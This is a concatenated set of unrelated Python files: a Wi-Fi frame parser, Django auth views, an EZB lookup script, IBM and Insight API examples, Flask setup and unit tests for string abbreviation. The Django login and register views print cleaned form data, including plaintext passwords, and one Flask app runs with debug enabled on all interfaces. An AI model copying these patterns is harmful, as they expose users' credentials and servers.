'tagged_params'} def __init__(self, frame, no_rtap=False): """ """ Management.__init__(self, frame, no_rtap) idx = 0 self.ta = self.ra = self.bssid = None self.seq_num = self.frag_num = None seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs() idx = seq_idx self.seq_num, self.frag_num = self.strip_seq_cntrl(idx) idx += 2 if idx < len(self._packet): self._raw_tagged_params = self._packet[idx:] is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params) if len(tagged_params): self.tagged_params = tagged_params if is_out_bound: logging.error("tag_len header not matched with raw byte counts") class Beacon(Management): """Beacon (type: 0, subtype: 0)""" _sfields_ = [('ra', ctypes.c_char_p), # receiver address ('ta', ctypes.c_char_p), # transmitter address ('bssid', ctypes.c_char_p), # basic service set identifier ('frag_num', ctypes.c_uint), # fragment number ('seq_num', ctypes.c_uint), # sequence number ('timestamp', ctypes.c_uint64), # timestamp ('interval', ctypes.c_uint), # interval ('tagged_params', list)] # tagged parameters # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.ta': 'ta', 'wlan.ra': 'ra', 'wlan.bssid': 'bssid', 'wlan.frag': 'frag_num', 'wlan.seq': 'seq_num', 'wlan_mgt.fixed.timestamp': 'timestamp', 'wlan_mgt.fixed.beacon': 'interval', 'wlan_mgt.tagged.all': 'tagged_params'} _sfields_ += Management._capabilities_ _s_shark_.update(Management._scapabilities_) def __init__(self, frame, no_rtap=False): """Constructor method. :frame: ctypes.Structure """ Management.__init__(self, frame, no_rtap) idx = 0 self.timestamp = self.interval = None self.ta = self.ra = self.bssid = None self.seq_num = self.frag_num = None # fixed capability fields self.ess = self.ibss = None self.privacy = None self.priv = self.short_preamble = self.pbcc = self.chan_agility = None self.spec_man = self.short_slot = self.apsd = self.radio_meas = None self.dss_ofdm = self.del_back = self.imm_back = None seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs() idx = seq_idx self.seq_num, self.frag_num = self.strip_seq_cntrl(idx) idx += 2 payload = self._packet[idx:idx + 12] timestamp, interval, fixed_capabils = self.strip_fixed_params(payload) if all([timestamp, interval, fixed_capabils]): self.timestamp = timestamp self.interval = interval self.set_fixed_capabils(fixed_capabils) idx += 12 else: logging.warning("failed to parse fixed parameters") return if idx < len(self._packet): self._raw_tagged_params = self._packet[idx:] is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params) if len(tagged_params): self.tagged_params = tagged_params if is_out_bound: logging.warning("tag_len header not matched with raw byte counts") def __str__(self): frame = "%s from %s (tstamp: %d, interval: %d)" frame = frame % (self.name, self.bssid, self.timestamp, self.interval) return frame class Control(Wifi): """Control Frames (type: 1)""" def __init__(self, frame, no_rtap=False): """Constructor method. :frame: ctypes.Structure """ Wifi.__init__(self, frame, no_rtap) def __str__(self): return self.name class RTS(Control): """Request to Send Frame (type: 1, subtype: 1)""" _sfields_ = [('ta', ctypes.c_char_p), # transmitter address ('ra', ctypes.c_char_p)] # receiver address # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.ta': 'ta', 'wlan.ra': 'ra'} def __init__(self, frame, no_rtap=False): """Constructor method. :frame: ctypes.Structure """ Control.__init__(self, frame, no_rtap) (ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16]) self.ra = Wifi.get_mac_addr(ra_mac) self.ta = Wifi.get_mac_addr(ta_mac) def __str__(self): frame = '%s from %s to %s (duration: %d us)' frame = frame % (self.name, self.ta, self.ra, self.duration) return frame class CTS(Control): """Clear to Send Frame (type: 1, subtype: 2)""" _sfields_ = [('ra', ctypes.c_char_p)] # receiver address -> wlan.ra # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.ra': 'ra'} def __init__(self, frame, no_rtap=False): """Constructor method. :frame: ctypes.Structure """ Control.__init__(self, frame, no_rtap) ra_mac = struct.unpack('!6s', self._packet[4:10])[0] self.ra = Wifi.get_mac_addr(ra_mac) def __str__(self): frame = '%s to %s (duration: %d us)' frame = frame % (self.name, self.ra, self.duration) return frame class BACK(Control): _sfields_ = [('ra', ctypes.c_char_p), # receiver address ('ta', ctypes.c_char_p), # transmitter address ('ackpolicy', ctypes.c_bool), # acknowledgement policy ('multitid', ctypes.c_bool), # multiple traffic identifier ('ssc_frag', ctypes.c_uint), # starting sequence number fragment ('ssc_seq', ctypes.c_uint), # starting sequence number ('bitmap_str', ctypes.c_char_p), # bitmap string -> in wlan.ba.bm ('acked_seqs', list)] # acknowledged strings -> in wlan.ba.bm and wlan_mgt.fixed.ssc.sequence # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.ra': 'ra', 'wlan.ta': 'ta', 'wlan.ba.control.ackpolicy': 'ackpolicy', 'wlan.ba.control.multitid': 'multitid', 'wlan_mgt.fixed.ssc.fragment': 'ssc_frag', 'wlan_mgt.ssc.sequence': 'ssc_seq'} """Block Acknowledgement Frame (type: 1, subtype: 9)""" def __init__(self, frame, no_rtap=False): """Constructor method. :frame: ctypes.Structure """ Control.__init__(self, frame, no_rtap) (ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16]) self.ra = self.ta = None self.ackpolicy = self.multitid = None self.ssc_frag = self.ssc_seq = None self.bitmap_str = None self.acked_seqs = [] self.ra = Wifi.get_mac_addr(ra_mac) self.ta = Wifi.get_mac_addr(ta_mac) idx = 16 payload = self._packet[idx:idx + 2] self.ackpolicy, self.multitid = BACK.strip_cntrl(payload) idx += 2 payload = self._packet[idx:idx + 2] self.ssc_seq, self.ssc_frag = BACK.strip_ssc(payload) idx += 2 payload = self._packet[idx:idx + 8] self.bitmap_str = BACK.strip_bitmap_str(payload) idx += 8 self.acked_seqs = BACK.extract_acked_seqs(self.bitmap_str, self.ssc_seq) def get_shark_field(self, fields): """ :fields: str[] """ out = super(BACK, self).get_shark_field(fields) out.update({'acked_seqs': self.acked_seqs, 'bitmap_str': self.bitmap_str}) return out @staticmethod def strip_cntrl(payload): """strip(2 byte) wlan.ba.control :payload: ctypes.structure :return: int multitid (tid: traffic indicator) :return: int ackpolicy """ cntrl = struct.unpack('H', payload)[0] cntrl_bits = format(cntrl, '016b')[::-1] ackpolicy = int(cntrl_bits[0]) multitid = int(cntrl_bits[1]) return ackpolicy, multitid @staticmethod def strip_ssc(payload): """strip(2 byte) wlan_mgt.fixed.ssc :payload: ctypes.structure :return: int ssc_seq (starting sequence control sequence) :return: int ssc_frag (starting sequence control fragment number) """ ssc = struct.unpack('H', payload)[0] ssc_seq = ssc >> 4 ssc_frag = ssc & 0x000f return ssc_seq, ssc_frag @staticmethod def strip_bitmap_str(payload): """strip(8 byte) wlan.ba.bm :payload: ctypes.structure :return: str bitmap """ bitmap = struct.unpack('BBBBBBBB', payload) bitmap_str = '' for elem in bitmap: bitmap_str += format(elem, '08b')[::-1] return bitmap_str @staticmethod def extract_acked_seqs(bitmap, ssc_seq): """extracts acknowledged sequences from bitmap and starting sequence number. :bitmap: str :ssc_seq: int :return: int[] acknowledged sequence numbers """ acked_seqs = [] for idx, val in enumerate(bitmap): if int(val) == 1: seq = (ssc_seq + idx) % 4096 acked_seqs.append(seq) return acked_seqs def __str__(self): frame = '%s from %s to %s (starting seq: %d, num_acked: %d)' frame = frame % (self.name, self.ta, self.ra, self.ssc_seq, len(self.acked_seqs)) return frame class Unknown(Wifi): """ un-identified packet """ def __init__(self, frame, no_rtap): Wifi.__init__(self, frame, no_rtap) self.name = "Unkown"
py
1a3f89a636c8e244e089013340c4d435cdebe456
from django.contrib.auth import authenticate, login, get_user_model from django.shortcuts import render, redirect from django.http import HttpResponse from .forms import ContactForm, LoginForm, RegisterForm def home_page(request): context = { "title": "Hello, I am Anil Choudhary.", "content": "Welcome to the Homepage.", } if request.user.is_authenticated: context['premium_content'] = "you are awesome" return render(request, "home_page.html", context) def about_page(request): context = { "title": "About page", "content": "Welcome to the about page" } return render(request, "home_page.html", context) def contact_page(request): contact_form = ContactForm(request.POST or None) context = { "title": "Contact page", "content": "Welcome to the contact page", "form": contact_form } if contact_form.is_valid(): print(contact_form.cleaned_data) # if request.method == "POST": # # print(request.POST) # print(request.POST.get('fullname')) # print(request.POST.get('email')) # print(request.POST.get('content')) return render(request, "contact/view.html", context) def login_page(request): form = LoginForm(request.POST or None) context = { "form": form } print("user logged in?") print(request.user.is_authenticated) if form.is_valid(): print(form.cleaned_data) username = form.cleaned_data['username'] password = form.cleaned_data['password'] user = authenticate(request, username=username, password=password) print(request.user.is_authenticated) if user is not None: print(request.user.is_authenticated) login(request, user) # context['form'] = LoginForm() return redirect("/") else: print("Please, register with us") return render(request, "auth/login.html", context) User = get_user_model() def register_page(request): form = RegisterForm(request.POST or None) context = { 'form': form, } if form.is_valid(): print(form.cleaned_data) username = form.cleaned_data['username'] email = form.cleaned_data['email'] password = form.cleaned_data['password'] new_user = User.objects.create_user(username, email, password) print(new_user) return render(request, "auth/register.html", context) def shop_page(request): context = { "title": "Shop page", "content": "Welcome to the shop page" } return render(request, "home_page.html", context)
py
1a3f8b275037cde1c338fbf02cdda190b073025a
import json import pandas as pd import numpy as np import requests from cleanup import bubi_coredata try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup # ruft die collection id für einen collection-Eintrag ab def get_ezb_id(collection): # falls keine collection angegeben, ein leeres Feld zurückgeben if collection == '': return '' # die URL zur ezb bilden url = 'https://ezb.ur.de/api/collections/' + collection # Seite abrufen request = requests.get(url) # wenn die Abfrage erfolgreich war (status = 200) dann die Werte auslesen if request.status_code == 200: # den Inhalt der Seite (=request.content) mit BeutifulSoup # https://www.crummy.com/software/BeautifulSoup/bs4/doc/ einlesen parsed_html = BeautifulSoup(request.content, features="lxml") # im p-Tag den JSON-formatierten Inhalt einlesen. Da dort manchmal Hinweise stehen, das ganze in einen try- # catch-Block einfassen. Falls der Inhalt sich nicht als JSON einlesen lässt, wird ein leeres Feld # zurückgegeben. Ansonsten wird das Feld "coll_id" aus dem JSON-Teil ausgelesen und zurückgegeben try: json_object = json.loads(parsed_html.find("p").get_text()) return json_object['coll_id'] except: return '' # falls der Aufruf der Seite keinen Erfolg hatte (status is nicht 200) wird ein leeres Feld zurückgegeben. else: return "" def collect_data(filename): # der Pfad zu der Originaldatei, in diesem Fall im Unterordner data/input, ausgehend von dem Ort dieser Datei path = 'data/input/{}'.format(filename) # Lese die Datei ein, dabei aufpassen, dass die package:collection-Spalte als Text eingelesen wird df = pd.read_excel(path, dtype={'package:collection': str, 'zdb_id': str}) # alle "Not a number" (nan) durch leere Textfelder ersetzen df = df.replace(np.nan, "", regex=True) # Liste der zu schreibenden Reihen vorbereiten extended_rows = [] # alle Spalten abarbeiten for index, row in df.iterrows(): # für jeden hundertsten Eintrag den aktuellen Stand auf der Kommandozeile angeben. if index % 100 == 0: print("processing line {} of {}".format(index, len(df))) # die ezb collection id abfragen durch Aufruf der oben definierten Funktion ezb_collection_id = get_ezb_id(row['package:collection']) # als neuen Wert in die Spalte "collection_id" eintragen row['collection_id'] = ezb_collection_id # diese Reihe der Liste der zu schreibenden Reihen anhängen extended_rows.append(row) # die Liste der zu schreibenden Reihen in ein Pandas-Dataframe umwandeln output_df = pd.DataFrame(extended_rows) # das Dataframe in eine Datei schreiben. diese heißt genauso wie die Ursprungsdatei, mit vorgehängtem "out_" und # befindet sich im Ordner data/output relativ zu dieser Datei output_df.to_excel('data/output/out_{}'.format(filename)) # python-Standard-Startpunkt für das Skript if __name__ == '__main__': # der Dateiname der zu erweiternden Datei im Ordner data/input relativ zu dieser Datei filename = 'Grunddaten_Essen' # obige Funktion aufrufen und Daten sammeln bubi_coredata.transform_coredata(filename, 'E')
py
1a3f8c0522f5ad324f480da05570d126d4afa613
from ibm_cloud_security_advisor import NotificationsApiV1 from ibm_cloud_sdk_core.authenticators import IAMAuthenticator authenticator = IAMAuthenticator( apikey='abc') notifications_service =NotificationsApiV1(authenticator=authenticator) notifications_service.set_service_url("https://us-south.secadvisor.cloud.ibm.com/notifications") data = { "name": "sdk_test_notification1", "description": "test1 description", "type": "Webhook", "endpoint": "http://test.com", "enabled": True, "severity": [ "high", "medium", "low", "critical" ], "alert_source": [ { "provider_name": "VA", "finding_types": [ "ALL" ] }, { "provider_name": "CERT", "finding_types": [ "ALL" ] } ] } response = notifications_service.create_notification_channel( account_id="abc", **data ) print(response)
py
1a3f8c3bd14cf4a4e406c5bf30d764108a4911e2
#! /usr/bin/env python from os import environ from insightlab import Insight, InsightObjects TOKEN = environ.get("INSIGHT_TOKEN", "") ## Set login i = Insight.API(TOKEN, "4") ## Load the object my_server = i.load("IDLAB-5709") print(f"Current hostname: {my_server.attribute_value_by_name('Hostname')}") ## Find the attribute's id id = my_server.attribute_id_by_name("Hostname") ## Create the attribute object and add the value attr = InsightObjects.Attributes(id) attr.add_value("new_hostname.test.idlab.org") ## Update the attribute's value i.update_attribute(my_server.id, attr) # Reload the object my_server = i.load("IDLAB-5709") print(f"New hostname: {my_server.attribute_value_by_name('Hostname')}") input("Press Enter to continue...") # Reset to original i.update_attribute(my_server.id, id, ["test.server.idlab.org"])
py
1a3f8cb507513d44067eec796322a3c7cdca46da
# coding=utf-8 # Copyright 2018-2020 EVA # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from src.parser.statement import AbstractStatement from src.parser.types import StatementType from src.parser.table_ref import TableRef from typing import List from src.parser.types import ParserColumnDataType class ColumnConstraintInformation: def __init__(self): self.nullable = False self.default_value = None self.primary = False self.unique = False class ColumnDefinition: def __init__(self, col_name: str, col_type: ParserColumnDataType, col_dim: List[int], cci: ColumnConstraintInformation = None): self._name = col_name self._type = col_type self._dimension = col_dim #column constarint info if cci is not None: self._unique_column_constraint = cci.unique self._nullable = cci.nullable self._primary = cci.primary self._default_value = cci.default_value @property def name(self): return self._name @property def type(self): return self._type @property def dimension(self): return self._dimension def __str__(self): return '{} {} {}'.format(self._name, self._type, self._dimension) def __eq__(self, other): if not isinstance(other, ColumnDefinition): # don't attempt to compare against unrelated types return NotImplemented return self.name == other.name and \ self.type == other.type and self.dimension == other.dimension class CreateTableStatement(AbstractStatement): """Create Table Statement constructed after parsing the input query Attributes: TableRef: table reference in the create table statement ColumnList: list of columns """ def __init__(self, table_ref: TableRef, if_not_exists: bool, column_list: List[ColumnDefinition] = None): super().__init__(StatementType.CREATE) self._table_ref = table_ref self._if_not_exists = if_not_exists self._column_list = column_list def __str__(self) -> str: print_str = "CREATE TABLE {} ({}) ".format(self._table_ref, self._if_not_exists) return print_str @property def table_ref(self): return self._table_ref @property def if_not_exists(self): return self._if_not_exists @property def column_list(self): return self._column_list
py
1a3f8d02f27558dcd22c1f6e399f57f72a3eba4d
from flask import Flask from flask_sqlalchemy import SQLAlchemy from config import config_options from flask_bootstrap import Bootstrap from flask_login import LoginManager from flask_uploads import UploadSet,configure_uploads,IMAGES from flask_mail import Mail mail = Mail() login_manager = LoginManager() login_manager.session_protection = 'strong' login_manager.login_view = 'auth.login' bootstrap = Bootstrap() db = SQLAlchemy() photos = UploadSet('photos', IMAGES) def create_app(config_name): # Initializing application app = Flask(__name__) #creating the app configurations app.config.from_object(config_options[config_name]) #Registering the Blueprint from .main import main as main_blueprint #Initializing Flask Extensionsin_blueprint app.register_blueprint(main_blueprint) bootstrap.init_app(app) db.init_app(app) login_manager.init_app(app) from .auth import auth as auth_blueprint app.register_blueprint(auth_blueprint,url_prefix = '/auth') mail.init_app(app) #setting config # from .request import configure_request # configure_r # request(app) #configure UploadSet configure_uploads(app,photos) #will add the views and the forms from .main import views,error return app
py
1a3f8eb1e9eb121f82de09e971acfd8b927301c6
from flask import Flask from flask import render_template app = Flask(__name__) @app.route('/') def index(): return render_template('index.html') if __name__ == "__main__": app.run(host="0.0.0.0", debug=True)
py
1a3f90bbf02eac2145f98157c4f9340816ed14b8
import mock import contextlib import locale import unittest from publish import * from unittestresults import get_test_results from junit import parse_junit_xml_files from test import d, n from unittestresults import get_stats, UnitTestCase, ParseError @contextlib.contextmanager def temp_locale(encoding) -> Any: old_locale = locale.getlocale() locale.setlocale(locale.LC_ALL, encoding) try: res = yield finally: locale.setlocale(locale.LC_ALL, old_locale) return res errors = [ParseError('file', 'error', 1, 2)] class PublishTest(unittest.TestCase): old_locale = None def test_abbreviate_characters(self): # None string self.assertIsNone(abbreviate(None, 1)) # 1 byte utf8 characters self.assertEqual('', abbreviate('', 1)) self.assertEqual('…', abbreviate('…', 1)) self.assertEqual('ab', abbreviate('ab', 3)) self.assertEqual('ab', abbreviate('ab', 2)) self.assertEqual('…', abbreviate('ab', 1)) self.assertEqual('abc', abbreviate('abc', 4)) self.assertEqual('abc', abbreviate('abc', 3)) self.assertEqual('a…', abbreviate('abc', 2)) self.assertEqual('…', abbreviate('abc', 1)) self.assertEqual('abcd', abbreviate('abcd', 4)) self.assertEqual('a…d', abbreviate('abcd', 3)) self.assertEqual('a…', abbreviate('abcd', 2)) self.assertEqual('…', abbreviate('abcd', 1)) self.assertEqual('abcde', abbreviate('abcde', 5)) self.assertEqual('ab…e', abbreviate('abcde', 4)) self.assertEqual('a…e', abbreviate('abcde', 3)) self.assertEqual('a…', abbreviate('abcde', 2)) self.assertEqual('…', abbreviate('abcde', 1)) self.assertEqual('abcdef', abbreviate('abcdef', 6)) self.assertEqual('ab…ef', abbreviate('abcdef', 5)) self.assertEqual('ab…f', abbreviate('abcdef', 4)) self.assertEqual('a…f', abbreviate('abcdef', 3)) self.assertEqual('a…', abbreviate('abcdef', 2)) self.assertEqual('…', abbreviate('abcdef', 1)) self.assertEqual('abcdefg', abbreviate('abcdefg', 7)) self.assertEqual('abc…fg', abbreviate('abcdefg', 6)) self.assertEqual('ab…fg', abbreviate('abcdefg', 5)) self.assertEqual('ab…g', abbreviate('abcdefg', 4)) self.assertEqual('a…g', abbreviate('abcdefg', 3)) self.assertEqual('a…', abbreviate('abcdefg', 2)) self.assertEqual('…', abbreviate('abcdefg', 1)) self.assertEqual('abcdefgh', abbreviate('abcdefgh', 8)) self.assertEqual('abc…fgh', abbreviate('abcdefgh', 7)) self.assertEqual('abc…gh', abbreviate('abcdefgh', 6)) self.assertEqual('ab…gh', abbreviate('abcdefgh', 5)) self.assertEqual('ab…h', abbreviate('abcdefgh', 4)) self.assertEqual('a…h', abbreviate('abcdefgh', 3)) self.assertEqual('a…', abbreviate('abcdefgh', 2)) self.assertEqual('…', abbreviate('abcdefgh', 1)) self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 27)) self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 26)) self.assertEqual('abcdefghijkl…opqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 25)) # 2 bytes utf8 characters self.assertEqual('»»»»»', abbreviate('»»»»»', 5)) self.assertEqual('»»…»', abbreviate('»»»»»', 4)) self.assertEqual('»…»', abbreviate('»»»»»', 3)) self.assertEqual('»…', abbreviate('»»»»»', 2)) self.assertEqual('…', abbreviate('»»»»»', 1)) self.assertEqual('»»»»»»', abbreviate('»»»»»»', 6)) self.assertEqual('»»…»»', abbreviate('»»»»»»', 5)) self.assertEqual('»»…»', abbreviate('»»»»»»', 4)) self.assertEqual('»…»', abbreviate('»»»»»»', 3)) self.assertEqual('»…', abbreviate('»»»»»»', 2)) self.assertEqual('…', abbreviate('»»»»»»', 1)) # 3 bytes utf8 characters self.assertEqual('▊▋▌▍▎', abbreviate('▊▋▌▍▎', 5)) self.assertEqual('▊▋…▎', abbreviate('▊▋▌▍▎', 4)) self.assertEqual('▊…▎', abbreviate('▊▋▌▍▎', 3)) self.assertEqual('▊…', abbreviate('▊▋▌▍▎', 2)) self.assertEqual('…', abbreviate('▊▋▌▍▎', 1)) self.assertEqual('▊▋▌▍▎▏', abbreviate('▊▋▌▍▎▏', 6)) self.assertEqual('▊▋…▎▏', abbreviate('▊▋▌▍▎▏', 5)) self.assertEqual('▊▋…▏', abbreviate('▊▋▌▍▎▏', 4)) self.assertEqual('▊…▏', abbreviate('▊▋▌▍▎▏', 3)) self.assertEqual('▊…', abbreviate('▊▋▌▍▎▏', 2)) self.assertEqual('…', abbreviate('▊▋▌▍▎▏', 1)) # 4 bytes utf8 characters self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25)) # mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3, 4] self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 9)) self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 8)) self.assertEqual('a»▉…»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 7)) self.assertEqual('a»▉…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 6)) self.assertEqual('a»…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 5)) self.assertEqual('a»…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 4)) self.assertEqual('a…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 3)) self.assertEqual('a…', abbreviate('a»▉𝒂a»▉𝒂', 2)) self.assertEqual('…', abbreviate('a»▉𝒂a»▉𝒂', 1)) self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 8)) self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 7)) self.assertEqual('a»▉…»▉', abbreviate('a»▉𝒂a»▉', 6)) self.assertEqual('a»…»▉', abbreviate('a»▉𝒂a»▉', 5)) self.assertEqual('a»…▉', abbreviate('a»▉𝒂a»▉', 4)) self.assertEqual('a…▉', abbreviate('a»▉𝒂a»▉', 3)) self.assertEqual('a…', abbreviate('a»▉𝒂a»▉', 2)) self.assertEqual('…', abbreviate('a»▉𝒂a»▉', 1)) # invalid abbreviation lengths self.assertRaises(ValueError, lambda: abbreviate('abc', 0)) self.assertRaises(ValueError, lambda: abbreviate('abc', -1)) def test_abbreviate_bytes(self): # None string self.assertIsNone(abbreviate_bytes(None, 3)) # even number of characters # 4 bytes utf characters self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 105)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 104)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 103)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 102)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 101)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 100)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 99)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 98)) self.assertEqual('𝒂𝒃𝒄…𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27)) self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26)) self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25)) self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 7)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 6)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 5)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 4)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 3)) # 1 byte utf characters self.assertEqual('ab…yz', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 7)) self.assertEqual('ab…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 6)) self.assertEqual('a…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 5)) 